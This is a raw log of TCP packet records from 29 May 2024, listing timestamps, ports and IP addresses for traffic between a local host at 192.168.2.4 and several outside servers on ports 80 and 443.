May 29, 2024 14:25:19.117539883 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117548943 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117559910 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117571115 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117582083 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117580891 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117609024 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117630959 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117793083 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117816925 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117835999 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117844105 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117851019 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117882967 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117893934 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.117904902 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.117934942 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118022919 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118077040 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118099928 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118115902 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118127108 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118155956 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118168116 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118189096 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118211985 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118216038 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118262053 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118298054 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118324041 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118335009 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118344069 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118356943 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:19.118364096 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118407965 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.118407965 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.612190008 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.613214970 CEST	49746	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:19.618163109 CEST	80	49746	111.90.158.40	192.168.2.4
May 29, 2024 14:25:20.449337959 CEST	443	49752	173.222.162.51	192.168.2.4
May 29, 2024 14:25:20.449404955 CEST	443	49752	173.222.162.51	192.168.2.4
May 29, 2024 14:25:20.449500084 CEST	49752	443	192.168.2.4	173.222.162.51
May 29, 2024 14:25:20.449568033 CEST	443	49752	173.222.162.51	192.168.2.4
May 29, 2024 14:25:20.449866056 CEST	49753	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.454767942 CEST	80	49753	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.455290079 CEST	49753	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.455620050 CEST	49753	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.460485935 CEST	80	49753	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.909532070 CEST	80	49753	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.909763098 CEST	80	49753	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.911403894 CEST	49753	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.915352106 CEST	49753	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.915352106 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.920255899 CEST	80	49753	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.920277119 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:20.920500994 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.923207045 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:20.928059101 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.392859936 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.393034935 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.393059015 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.393079042 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.393205881 CEST	49754	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.393342972 CEST	49755	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.398050070 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.398061037 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.398067951 CEST	80	49754	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.398238897 CEST	80	49755	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.398464918 CEST	49755	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.398622990 CEST	49755	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.403523922 CEST	80	49755	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.874485016 CEST	80	49755	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.874519110 CEST	80	49755	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.874591112 CEST	49755	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.878900051 CEST	49755	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.883857012 CEST	80	49755	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.885941982 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.890841007 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:21.891285896 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.896819115 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:21.901741028 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:22.345400095 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:22.345546007 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:22.345624924 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:22.454340935 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:22.454391956 CEST	49756	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:22.454642057 CEST	49757	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:22.459296942 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:22.459307909 CEST	80	49756	199.232.214.172	192.168.2.4
May 29, 2024 14:25:22.459484100 CEST	80	49757	192.229.221.95	192.168.2.4
May 29, 2024 14:25:22.459578037 CEST	49757	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:22.468682051 CEST	49757	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:22.473629951 CEST	80	49757	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.116615057 CEST	80	49757	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.116653919 CEST	80	49757	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.116723061 CEST	49757	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.116750002 CEST	49757	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.117077112 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.123990059 CEST	80	49757	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.124237061 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.124303102 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.124490023 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.131772995 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.769167900 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.769257069 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.769334078 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.769371986 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.769526005 CEST	49758	80	192.168.2.4	192.229.221.95
May 29, 2024 14:25:23.769818068 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:23.774218082 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.774336100 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:23.774347067 CEST	80	49758	192.229.221.95	192.168.2.4
May 29, 2024 14:25:24.120402098 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:24.125351906 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:24.125451088 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:24.125575066 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:24.130434036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:24.797043085 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:24.802062988 CEST	80	49759	199.232.214.172	192.168.2.4
May 29, 2024 14:25:24.804060936 CEST	49759	80	192.168.2.4	199.232.214.172
May 29, 2024 14:25:25.098014116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098050117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098062038 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098073959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098086119 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098098993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098109961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098121881 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098134995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098146915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.098150969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.098220110 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.103892088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.103910923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.103954077 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.371251106 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371284008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371293068 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371380091 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.371431112 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371471882 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.371494055 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371505976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371515036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371529102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.371541977 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.371570110 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.372291088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.372343063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.372356892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.372374058 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.372387886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.372387886 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.372421026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.373174906 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.373195887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.373222113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.373226881 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.373240948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.373250961 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.373270988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.373297930 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.374042034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.374083042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.374099970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.374110937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.374141932 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.374159098 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.376291990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.376316071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.376388073 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618218899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618244886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618262053 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618273020 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618311882 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618321896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618339062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618355989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618366957 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618367910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618386984 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618391037 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618408918 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618424892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618437052 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618458033 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618688107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618709087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618733883 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618773937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618788958 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618799925 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618808031 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618833065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.618906021 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618916035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618936062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618951082 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618962049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618973970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.618982077 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.619015932 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.619594097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619625092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619674921 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.619680882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619690895 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619702101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619714975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619725943 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.619735956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619748116 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.619762897 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.619793892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.621903896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622086048 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622096062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622144938 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622195959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622205973 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622216940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622227907 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622236967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622252941 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622256994 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622277975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622287989 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622288942 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622308016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622318983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622319937 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622329950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622340918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622351885 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622358084 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.622364044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.622375965 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.623312950 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.623338938 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.672153950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.700548887 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.750288963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.856641054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856658936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856674910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856687069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856697083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856708050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856718063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856729031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.856738091 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.856796980 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857023954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857033968 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857043028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857074022 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857176065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857214928 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857280016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857290983 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857300997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857311964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857321978 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857358932 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857574940 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857585907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857594013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857619047 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857630014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857640982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857657909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857666016 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857672930 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857685089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857693911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857700109 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857707024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.857714891 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.857742071 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.858283043 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858303070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858345032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858355999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858386993 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.858406067 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.858465910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858474970 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858485937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858496904 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858508110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858510017 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.858519077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858530045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.858532906 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.858549118 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859160900 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859172106 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859180927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859193087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859231949 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859257936 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859273911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859283924 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859292984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859302044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859313011 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859318018 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859323978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859330893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859335899 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859348059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.859349966 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.859375954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.860023975 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860075951 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.860117912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860129118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860138893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860148907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860158920 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860165119 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.860168934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.860197067 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.860208035 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.945903063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.945926905 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.945938110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946008921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946019888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946029902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946041107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946052074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946063042 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946074009 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946158886 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946172953 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946172953 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946172953 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946238995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946252108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946265936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946280003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946295023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946333885 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:25.946594954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946607113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:25.946618080 CEST	80	49760	111.90.158.40	192.168.2.4
